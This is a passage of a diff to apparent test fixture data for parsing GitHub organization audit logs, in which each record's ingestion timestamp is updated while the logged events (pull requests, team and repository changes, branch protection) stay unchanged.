"{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030216,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -2895,7 +2895,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041341291Z", + "ingested": "2021-12-14T14:44:07.248210315Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1617579367679,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2933,7 +2933,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041346751Z", + "ingested": "2021-12-14T14:44:07.248210718Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619473421968,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -2971,7 +2971,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041351730Z", + "ingested": "2021-12-14T14:44:07.248211102Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.merge\",\"created_at\":1619733612746,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3011,7 +3011,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041356750Z", + "ingested": "2021-12-14T14:44:07.248211486Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1619473078873,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -3052,7 +3052,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041362400Z", + "ingested": "2021-12-14T14:44:07.248211886Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-abc-123\",\"created_at\":1619733030283,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3093,7 +3093,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041368041Z", + "ingested": "2021-12-14T14:44:07.248212276Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1619472400915,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3131,7 +3131,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041373311Z", + "ingested": "2021-12-14T14:44:07.248212774Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.create_review_request\",\"created_at\":1623197286783,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3169,7 +3169,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041378220Z", + "ingested": "2021-12-14T14:44:07.248213185Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284928961,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3207,7 +3207,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041383059Z", + "ingested": "2021-12-14T14:44:07.248213570Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623197303036,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -3245,7 +3245,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041387888Z", + "ingested": "2021-12-14T14:44:07.248213949Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623709113238,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3283,7 +3283,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041392848Z", + "ingested": "2021-12-14T14:44:07.248214356Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200606165,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3321,7 +3321,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041398218Z", + "ingested": "2021-12-14T14:44:07.248214745Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852455604,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3359,7 +3359,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041403417Z", + "ingested": "2021-12-14T14:44:07.248215126Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852615112,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3397,7 +3397,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041410521Z", + "ingested": "2021-12-14T14:44:07.248215514Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623709107881,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -3435,7 +3435,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041415991Z", + "ingested": "2021-12-14T14:44:07.248215892Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284935234,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3473,7 +3473,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041421151Z", + "ingested": "2021-12-14T14:44:07.248216275Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200615714,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3511,7 +3511,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041426170Z", + "ingested": "2021-12-14T14:44:07.248216658Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623366866659,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3549,7 +3549,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041431580Z", + "ingested": "2021-12-14T14:44:07.248217128Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623200629331,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3587,7 +3587,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041436600Z", + "ingested": "2021-12-14T14:44:07.248217521Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.create_review_request\",\"created_at\":1623197274294,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -3625,7 +3625,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041441529Z", + "ingested": "2021-12-14T14:44:07.248217903Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623200651042,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3663,7 +3663,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041447330Z", + "ingested": "2021-12-14T14:44:07.248218304Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1623197300963,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3701,7 +3701,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041453301Z", + "ingested": "2021-12-14T14:44:07.248218685Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request_review.submit\",\"created_at\":1622852649552,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3739,7 +3739,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041458320Z", + "ingested": "2021-12-14T14:44:07.248219077Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1622852723876,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3777,7 +3777,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041463771Z", + "ingested": "2021-12-14T14:44:07.248219459Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623284903152,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -3815,7 +3815,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041468800Z", + "ingested": "2021-12-14T14:44:07.248219845Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623197138430,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3855,7 +3855,7 @@ }, "event": { "action": "protected_branch.rejected_ref_update", - "ingested": "2021-10-12T20:36:26.041473890Z", + "ingested": "2021-12-14T14:44:07.248220246Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123\",\"created_at\":1623200513984,\"action\":\"protected_branch.rejected_ref_update\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3893,7 +3893,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041478729Z", + "ingested": "2021-12-14T14:44:07.248220623Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623366896448,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3931,7 +3931,7 @@ }, "event": { "action": "pull_request.create_review_request", - "ingested": "2021-10-12T20:36:26.041483678Z", + "ingested": "2021-12-14T14:44:07.248221072Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623371009948,\"action\":\"pull_request.create_review_request\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -3969,7 +3969,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041488577Z", + "ingested": "2021-12-14T14:44:07.248221462Z", "original": "{\"actor\":\"github-actor\",\"action\":\"pull_request.merge\",\"created_at\":1623197309607,\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -4007,7 +4007,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041493607Z", + "ingested": "2021-12-14T14:44:07.248221843Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1623371005977,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4047,7 +4047,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041498806Z", + "ingested": "2021-12-14T14:44:07.248222249Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625314262517,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4087,7 +4087,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041504287Z", + "ingested": "2021-12-14T14:44:07.248222661Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283218542,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4128,7 +4128,7 @@ }, "event": { "action": "repo.add_member", - "ingested": "2021-10-12T20:36:26.041509166Z", + "ingested": "2021-12-14T14:44:07.248223043Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283218373,\"action\":\"repo.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4166,7 +4166,7 @@ }, "event": { "action": "repo.update_default_branch", - "ingested": "2021-10-12T20:36:26.041514115Z", + "ingested": "2021-12-14T14:44:07.248223434Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1625283222495,\"action\":\"repo.update_default_branch\"}", "type": [ "access" 
@@ -4207,7 +4207,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041518834Z", + "ingested": "2021-12-14T14:44:07.248223822Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754452056,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4257,7 +4257,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041523603Z", + "ingested": "2021-12-14T14:44:07.248224210Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754543604,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4307,7 +4307,7 @@ }, "event": { "action": "repo.add_member", - "ingested": "2021-10-12T20:36:26.041528412Z", + "ingested": "2021-12-14T14:44:07.248224670Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769833205,\"action\":\"repo.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4351,7 +4351,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041533221Z", + "ingested": "2021-12-14T14:44:07.248225050Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754473817,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" 
@@ -4400,7 +4400,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041537830Z", + "ingested": "2021-12-14T14:44:07.248225441Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769833389,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4441,7 +4441,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041543400Z", + "ingested": "2021-12-14T14:44:07.248225826Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/admins\"},\"org\":\"Example-Org\",\"created_at\":1629754474042,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4491,7 +4491,7 @@ }, "event": { "action": "team.update_repository_permission", - "ingested": "2021-10-12T20:36:26.041548400Z", + "ingested": "2021-12-14T14:44:07.248226249Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1629767631761,\"action\":\"team.update_repository_permission\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4535,7 +4535,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041553609Z", + "ingested": "2021-12-14T14:44:07.248226646Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754429430,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" 
@@ -4585,7 +4585,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041558579Z", + "ingested": "2021-12-14T14:44:07.248227185Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1629767578993,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4628,7 +4628,7 @@ }, "event": { "action": "repo.destroy", - "ingested": "2021-10-12T20:36:26.041563718Z", + "ingested": "2021-12-14T14:44:07.248227575Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-2021\",\"created_at\":1629769916760,\"action\":\"repo.destroy\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4669,7 +4669,7 @@ }, "event": { "action": "team.remove_member", - "ingested": "2021-10-12T20:36:26.041568758Z", + "ingested": "2021-12-14T14:44:07.248228261Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"created_at\":1629754452206,\"action\":\"team.remove_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -4718,7 +4718,7 @@ }, "event": { "action": "project.create", - "ingested": "2021-10-12T20:36:26.041573737Z", + "ingested": "2021-12-14T14:44:07.248228731Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631894812761,\"action\":\"project.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4753,7 +4753,7 @@ }, "event": { "action": "repo.actions_enabled", - "ingested": "2021-10-12T20:36:26.041578837Z", + "ingested": "2021-12-14T14:44:07.248229137Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146068095,\"action\":\"repo.actions_enabled\"}", "type": [ "access" 
@@ -4793,7 +4793,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041583525Z", + "ingested": "2021-12-14T14:44:07.248229533Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145649686,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4833,7 +4833,7 @@ }, "event": { "action": "protected_branch.update_required_status_checks_enforcement_level", - "ingested": "2021-10-12T20:36:26.041588334Z", + "ingested": "2021-12-14T14:44:07.248229930Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655619,\"action\":\"protected_branch.update_required_status_checks_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4873,7 +4873,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041593093Z", + "ingested": "2021-12-14T14:44:07.248230347Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834277596,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4913,7 +4913,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041598073Z", + "ingested": "2021-12-14T14:44:07.248230726Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504145,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -4953,7 +4953,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041603353Z", + "ingested": "2021-12-14T14:44:07.248231116Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632440423281,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -4991,7 +4991,7 @@ }, "event": { "action": "pull_request_review.submit", - "ingested": "2021-10-12T20:36:26.041608162Z", + "ingested": "2021-12-14T14:44:07.248231535Z", "original": "{\"actor\":\"github-actor\",\"created_at\":1631573140006,\"action\":\"pull_request_review.submit\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5031,7 +5031,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041612981Z", + "ingested": "2021-12-14T14:44:07.248231930Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146510168,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5071,7 +5071,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041618391Z", + "ingested": "2021-12-14T14:44:07.248232308Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631896079162,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5111,7 +5111,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041623140Z", + "ingested": "2021-12-14T14:44:07.248232692Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631834480813,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -5152,7 +5152,7 @@ }, "event": { "action": "team.add_member", - "ingested": "2021-10-12T20:36:26.041627959Z", + "ingested": "2021-12-14T14:44:07.248233087Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"created_at\":1631999351294,\"action\":\"team.add_member\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" @@ -5201,7 +5201,7 @@ }, "event": { "action": "required_status_check.create", - "ingested": "2021-10-12T20:36:26.041633289Z", + "ingested": "2021-12-14T14:44:07.248233524Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999445252,\"action\":\"required_status_check.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5241,7 +5241,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041638719Z", + "ingested": "2021-12-14T14:44:07.248233941Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504600,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5281,7 +5281,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041644590Z", + "ingested": "2021-12-14T14:44:07.248234325Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619331143,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -5321,7 +5321,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041650291Z", + "ingested": "2021-12-14T14:44:07.248234712Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630693170285,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5361,7 +5361,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041655290Z", + "ingested": "2021-12-14T14:44:07.248235099Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146504174,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5401,7 +5401,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041660330Z", + "ingested": "2021-12-14T14:44:07.248235486Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146507550,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5442,7 +5442,7 @@ }, "event": { "action": "protected_branch.create", - "ingested": "2021-10-12T20:36:26.041665099Z", + "ingested": "2021-12-14T14:44:07.248235933Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999445214,\"action\":\"protected_branch.create\",\"actor_location\":{\"country_code\":\"US\"},\"user\":\"github-user\"}", "type": [ "access" 
@@ -5485,7 +5485,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041676079Z", + "ingested": "2021-12-14T14:44:07.248236323Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631999520468,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5526,7 +5526,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041694434Z", + "ingested": "2021-12-14T14:44:07.248236713Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/authors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146103741,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5570,7 +5570,7 @@ }, "event": { "action": "team.add_repository", - "ingested": "2021-10-12T20:36:26.041702739Z", + "ingested": "2021-12-14T14:44:07.248237103Z", "original": "{\"actor\":\"github-actor\",\"data\":{\"team\":\"Example-Org/contributors\"},\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632146117823,\"action\":\"team.add_repository\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5613,7 +5613,7 @@ }, "event": { "action": "repo.create", - "ingested": "2021-10-12T20:36:26.041709171Z", + "ingested": "2021-12-14T14:44:07.248237495Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632145650082,\"action\":\"repo.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -5653,7 +5653,7 @@ }, "event": { "action": "protected_branch.update_linear_history_requirement_enforcement_level", - "ingested": "2021-10-12T20:36:26.041714982Z", + "ingested": "2021-12-14T14:44:07.248237872Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/Java\",\"created_at\":1632155655669,\"action\":\"protected_branch.update_linear_history_requirement_enforcement_level\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5693,7 +5693,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041720352Z", + "ingested": "2021-12-14T14:44:07.248238284Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1632421196978,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5733,7 +5733,7 @@ }, "event": { "action": "repo.change_merge_setting", - "ingested": "2021-10-12T20:36:26.041726434Z", + "ingested": "2021-12-14T14:44:07.248238683Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-5678\",\"created_at\":1630619330775,\"action\":\"repo.change_merge_setting\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5773,7 +5773,7 @@ }, "event": { "action": "pull_request.create", - "ingested": "2021-10-12T20:36:26.041731313Z", + "ingested": "2021-12-14T14:44:07.248239084Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631573111131,\"action\":\"pull_request.create\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" 
@@ -5813,7 +5813,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041736022Z", + "ingested": "2021-12-14T14:44:07.248239474Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631575577913,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5848,7 +5848,7 @@ }, "event": { "action": "repo.actions_enabled", - "ingested": "2021-10-12T20:36:26.041740841Z", + "ingested": "2021-12-14T14:44:07.248239860Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1631897960413,\"action\":\"repo.actions_enabled\"}", "type": [ "access" @@ -5888,7 +5888,7 @@ }, "event": { "action": "pull_request.merge", - "ingested": "2021-10-12T20:36:26.041745900Z", + "ingested": "2021-12-14T14:44:07.248240248Z", "original": "{\"actor\":\"github-actor\",\"org\":\"Example-Org\",\"repo\":\"Example-Org/repo-123-Java\",\"created_at\":1630693191818,\"action\":\"pull_request.merge\",\"actor_location\":{\"country_code\":\"US\"}}", "type": [ "access" @@ -5929,7 +5929,7 @@ }, "event": { "action": "protected_branch.create", - "ingested": "2021-10-12T20:36:26.041750669Z", + "ingested": "2021-12-14T14:44:07.248240634Z", "original": 